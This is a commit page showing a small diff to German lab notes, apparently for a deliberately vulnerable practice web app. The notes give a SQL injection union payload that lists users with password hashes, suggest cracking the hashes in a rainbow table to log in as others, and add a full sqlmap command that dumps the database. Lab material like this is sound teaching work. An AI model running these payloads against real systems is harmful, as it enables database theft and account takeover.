Commit 517dccf2 authored by David's avatar David
Browse files

added sqlmap hint

parent 9c85d08e
......@@ -12,3 +12,8 @@ Anzeigen aller Benuter mit zugehörigen Passworthashes: `foo' or '0' = '0' union
Die Passwörter können nun in einer Rainbowtable nachgeschaut werden (z.B. auf https://crackstation.net/ )
Nun kann man sich mit anderen Benutzerkennungen anmelden.
# Hack 4: Datenbank-Dump mit SQLMap
[SQLMap]() ist ein Programm zum automatisierten Testen auf und Ausnutzen von SQL-Injektion-Verwundbarkeiten.
Ein Beispielaufruf könnte so aussehen: `sqlmap.py -a -u "http://172.16.11.1/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=8mdd3q0vij1b3kuujt4vd8qca6; security=low"`
Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment